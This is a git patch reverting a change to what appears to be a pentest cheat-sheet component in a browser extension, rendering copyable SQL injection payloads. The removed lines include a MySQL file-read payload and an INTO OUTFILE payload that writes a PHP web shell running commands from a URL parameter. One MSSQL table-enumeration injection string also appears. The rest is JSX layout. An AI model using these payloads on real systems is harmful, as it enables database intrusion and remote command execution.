From 82264acd6cf05ea9fb5199298dd33a451be73feb Mon Sep 17 00:00:00 2001
From: br00x <47902351+rb-x@users.noreply.github.com>
Date: Sun, 25 Jun 2023 17:22:55 +0200
Subject: [PATCH] Revert "Insert Mysql File Insert and Read"

---
 .../components/web/SQLPage/SQLInjection.tsx   | 370 +++++++++---------
 1 file changed, 175 insertions(+), 195 deletions(-)

diff --git a/src/pages/popup/components/web/SQLPage/SQLInjection.tsx b/src/pages/popup/components/web/SQLPage/SQLInjection.tsx
index c6d6a22..f468967 100644
--- a/src/pages/popup/components/web/SQLPage/SQLInjection.tsx
+++ b/src/pages/popup/components/web/SQLPage/SQLInjection.tsx
@@ -1,9 +1,12 @@
-import React from 'react';
+import React, { useState } from 'react';
 import { Typography, Divider } from 'antd';
-
 const { Title, Paragraph, Text, Link } = Typography;
 
-export default function SQLi () {
+
+/*************************************** */
+
+export default function SQLInjection() {
+
     const DbColumnNumber = [
         {
             db_type: 'MySQL/MSSQL/PGSQL',
@@ -19,17 +22,6 @@ export default function SQLi () {
         },
     ]
 
-    const DbInsertAndReaderFile = [
-        {
-            db_type: 'MySQL',
-            title: "'select load_file('/var/lib/mysql-files/key.txt');"
-        },
-        {
-            db_type: 'MySQL',
-            title: `select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'`
-        }
-    ]
-
     const DbVersionEnumeration = [
         {
             db_type: 'MySQL/MSSQL',
@@ -142,199 +134,187 @@ export default function SQLi () {
             title: "' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --"
         }
     ];
-    return (
-        <div>
-            <Title level={2} style={{ fontWeight: 'bold', margin: 15 }}>
-                SQL Injection
-            </Title>
-            <Paragraph style={{ margin: 15 }}>
-                SQL injection (SQLi) is an application security weakness that allows attackers to control an
-                application’s database letting them access or delete data, change an application’s data-driven behavior,
-                and do other undesirable things by tricking the application into sending unexpected SQL commands.
-            </Paragraph>
-            <Divider dashed />
-            <div style={{ padding: 10, marginTop: 15 }} key='a'>
-                <Title level={3}>Number of column</Title>
-                {DbColumnNumber.map( ( k, i ) => {
-                    return (
-                        <>
-                            <Paragraph key={i}>
-                                <Link href={`#${ k.db_type }`}>{k.db_type}</Link>
-                            </Paragraph>
 
-                            <Paragraph key={i}>
-                                <pre><Text copyable>{k.title}</Text></pre>
-                            </Paragraph>
-                        </>
-                    );
-                } )}
-            </div>
-            <Divider dashed />
-            <div style={{ padding: 10, marginTop: 15 }} key='a'>
-                <Title level={3}>Read and Insert File</Title>
-                {DbInsertAndReaderFile.map( ( k, i ) => {
-                    return (
-                        <>
-                            <Paragraph key={i}>
-                                <Link href={`#${ k.db_type }`}>{k.db_type}</Link>
-                            </Paragraph>
+    /*****************************   */
 
+    return (
+        <>
+            <div>
+                <Title level={2} style={{ fontWeight: 'bold', margin: 15 }}>
+                    SQL Injection
+                </Title>
+                <Paragraph style={{ margin: 15 }}>
+                    SQL injection (SQLi) is an application security weakness that allows attackers to control an
+                    application’s database letting them access or delete data, change an application’s data-driven behavior,
+                    and do other undesirable things by tricking the application into sending unexpected SQL commands.
+                </Paragraph>
+                <Divider dashed />
+                <div style={{ padding: 10, marginTop: 15 }} key='a'>
+                    <Title level={3}>Number of column</Title>
+                    {DbColumnNumber.map((k, i) => {
+                        return (
+                            <>
+                                <Paragraph key={i}>
+                                    <Link href={`#${k.db_type}`}>{k.db_type}</Link>
+                                </Paragraph>
+
+                                <Paragraph key={i}>
+                                    <pre><Text copyable>{k.title}</Text></pre>
+                                </Paragraph>
+                            </>
+                        );
+                    })}
+                </div>
+                <Divider dashed />
+                <div style={{ padding: 10, marginTop: 15 }} key='a'>
+                    <Title level={3}>Database enumeration</Title>
+                    {DbVersionEnumeration.map((k, i) => {
+                        return (
+                            <>
+                                <Paragraph key={i}>
+                                    <Link href={`#${k.db_type}`}>{k.db_type}</Link>
+                                </Paragraph>
+                                <Paragraph key={i}>
+                                    <pre><Text copyable>{k.title}</Text></pre>
+                                </Paragraph>
+                            </>
+                        );
+                    })}
+                </div>
+                <Divider dashed />
+                <div style={{ padding: 10, marginTop: 15 }} key='a'>
+                    <Title level={3}>Tablename enumeration</Title>
+                    {DbTableEnumeration.map((k, i) => {
+                        return (
+                            <>
+                                <Paragraph key={i}>
+                                    <Link href={`#${k.db_type}`}>{k.db_type}</Link>
+                                </Paragraph>
+                                <Paragraph key={i}>
+                                    <pre><Text copyable>{k.title}</Text></pre>
+                                </Paragraph>
+                            </>
+                        );
+                    })}
+                </div>
+                <Divider dashed />
+                <div style={{ padding: 10, marginTop: 15 }} key='a'>
+                    <Title level={3}>Column name enumeration</Title>
+                    {DbColumnEnumeration.map((k, i) => {
+                        return (
+                            <>
+                                <Paragraph key={i}>
+                                    <Link href={`#${k.db_type}`}>{k.db_type}</Link>
+                                </Paragraph>
+                                <Paragraph key={i}>
+                                    <pre><Text copyable>{k.title}</Text></pre>
+                                </Paragraph>
+                            </>
+                        );
+                    })}
+                </div>
+                <Divider dashed />
+                <div style={{ padding: 10, marginTop: 15 }} key='a'>
+                    <Title level={3}>Column values concatenation</Title>
+                    {DbColValueConcatenation.map((k, i) => {
+                        return (
+                            <>
+                                <Paragraph key={i}>
+                                    <Link href={`#${k.db_type}`}>{k.db_type}</Link>
+                                </Paragraph>
+                                <Paragraph key={i}>
+                                    <pre><Text copyable>{k.title}</Text></pre>
+                                </Paragraph>
+                            </>
+                        );
+                    })}
+                </div>
+                <Divider dashed />
+                <div style={{ padding: 10, marginTop: 15 }} key='a'>
+                    <Title level={3}>Conditional ( Error Based ) </Title>
+                    {DbConditionalErrors.map((k, i) => {
+                        return (
+                            <>
+                                <Paragraph key={i}>
+                                    <Link href={`#${k.db_type}`}>{k.db_type}</Link>
+                                </Paragraph>
+                                <Paragraph key={i}>
+                                    <pre><Text copyable>{k.title}</Text></pre>
+                                </Paragraph>
+                            </>
+                        );
+                    })}
+                </div>
+                <Divider dashed />
+                <div
+                    key='b'
+                    style={{
+                        padding: 15,
+                        marginTop: 15
+                    }}
+                >
+                    <Title level={3}>Time-Based</Title>
+                    {TimeBased.map((k, i) => {
+                        return (
                             <Paragraph key={i}>
                                 <pre><Text copyable>{k.title}</Text></pre>
                             </Paragraph>
-                        </>
-                    );
-                } )}
-            </div>
-            <Divider dashed />
-            <div style={{ padding: 10, marginTop: 15 }} key='a'>
-                <Title level={3}>Database enumeration</Title>
-                {DbVersionEnumeration.map( ( k, i ) => {
-                    return (
-                        <>
-                            <Paragraph key={i}>
-                                <Link href={`#${ k.db_type }`}>{k.db_type}</Link>
-                            </Paragraph>
-                            <Paragraph key={i}>
-                                <pre><Text copyable>{k.title}</Text></pre>
-                            </Paragraph>
-                        </>
-                    );
-                } )}
-            </div>
-            <Divider dashed />
-            <div style={{ padding: 10, marginTop: 15 }} key='a'>
-                <Title level={3}>Tablename enumeration</Title>
-                {DbTableEnumeration.map( ( k, i ) => {
-                    return (
-                        <>
-                            <Paragraph key={i}>
-                                <Link href={`#${ k.db_type }`}>{k.db_type}</Link>
-                            </Paragraph>
-                            <Paragraph key={i}>
-                                <pre><Text copyable>{k.title}</Text></pre>
-                            </Paragraph>
-                        </>
-                    );
-                } )}
-            </div>
-            <Divider dashed />
-            <div style={{ padding: 10, marginTop: 15 }} key='a'>
-                <Title level={3}>Column name enumeration</Title>
-                {DbColumnEnumeration.map( ( k, i ) => {
-                    return (
-                        <>
-                            <Paragraph key={i}>
-                                <Link href={`#${ k.db_type }`}>{k.db_type}</Link>
-                            </Paragraph>
+                        );
+                    })}
+                </div>
+                <Divider dashed />
+                <div
+                    key='c'
+                    style={{
+                        padding: 15,
+                        marginTop: 15
+                    }}
+                >
+                    <Title level={3}>Generic Error Based Payloads</Title>
+                    {DbConditionalErrors.map((k, i) => {
+                        return (
                             <Paragraph key={i}>
+                                <Link>{k.db_type}</Link>
                                 <pre><Text copyable>{k.title}</Text></pre>
                             </Paragraph>
-                        </>
-                    );
-                } )}
-            </div>
-            <Divider dashed />
-            <div style={{ padding: 10, marginTop: 15 }} key='a'>
-                <Title level={3}>Column values concatenation</Title>
-                {DbColValueConcatenation.map( ( k, i ) => {
-                    return (
-                        <>
-                            <Paragraph key={i}>
-                                <Link href={`#${ k.db_type }`}>{k.db_type}</Link>
-                            </Paragraph>
+                        );
+                    })}
+                </div>
+                <Divider dashed />
+                <div
+                    key='d'
+                    style={{
+                        padding: 15,
+                        marginTop: 15
+                    }}
+                >
+                    <Title level={3}>Authentication Based Payloads</Title>
+                    {AuthBased.map((k, i) => {
+                        return (
                             <Paragraph key={i}>
                                 <pre><Text copyable>{k.title}</Text></pre>
                             </Paragraph>
-                        </>
-                    );
-                } )}
-            </div>
-            <Divider dashed />
-            <div style={{ padding: 10, marginTop: 15 }} key='a'>
-                <Title level={3}>Conditional ( Error Based ) </Title>
-                {DbConditionalErrors.map( ( k, i ) => {
-                    return (
-                        <>
-                            <Paragraph key={i}>
-                                <Link href={`#${ k.db_type }`}>{k.db_type}</Link>
-                            </Paragraph>
+                        );
+                    })}
+                </div>
+                <Divider dashed />
+                <div
+                    key='e'
+                    style={{
+                        padding: 15,
+                        marginTop: 15
+                    }}
+                >
+                    <Title level={3}>Order by and UNION Based Payloads</Title>
+                    {OrderUnion.map((k, i) => {
+                        return (
                             <Paragraph key={i}>
                                 <pre><Text copyable>{k.title}</Text></pre>
                             </Paragraph>
-                        </>
-                    );
-                } )}
-            </div>
-            <Divider dashed />
-            <div
-                key='b'
-                style={{
-                    padding: 15,
-                    marginTop: 15
-                }}
-            >
-                <Title level={3}>Time-Based</Title>
-                {TimeBased.map( ( k, i ) => {
-                    return (
-                        <Paragraph key={i}>
-                            <pre><Text copyable>{k.title}</Text></pre>
-                        </Paragraph>
-                    );
-                } )}
-            </div>
-            <Divider dashed />
-            <div
-                key='c'
-                style={{
-                    padding: 15,
-                    marginTop: 15
-                }}
-            >
-                <Title level={3}>Generic Error Based Payloads</Title>
-                {DbConditionalErrors.map( ( k, i ) => {
-                    return (
-                        <Paragraph key={i}>
-                            <Link>{k.db_type}</Link>
-                            <pre><Text copyable>{k.title}</Text></pre>
-                        </Paragraph>
-                    );
-                } )}
-            </div>
-            <Divider dashed />
-            <div
-                key='d'
-                style={{
-                    padding: 15,
-                    marginTop: 15
-                }}
-            >
-                <Title level={3}>Authentication Based Payloads</Title>
-                {AuthBased.map( ( k, i ) => {
-                    return (
-                        <Paragraph key={i}>
-                            <pre><Text copyable>{k.title}</Text></pre>
-                        </Paragraph>
-                    );
-                } )}
-            </div>
-            <Divider dashed />
-            <div
-                key='e'
-                style={{
-                    padding: 15,
-                    marginTop: 15
-                }}
-            >
-                <Title level={3}>Order by and UNION Based Payloads</Title>
-                {OrderUnion.map( ( k, i ) => {
-                    return (
-                        <Paragraph key={i}>
-                            <pre><Text copyable>{k.title}</Text></pre>
-                        </Paragraph>
-                    );
-                } )}
-            </div>
-        </div>
-    );
+                        );
+                    })}
+                </div>
+            </div>)
+        </>
+    )
 }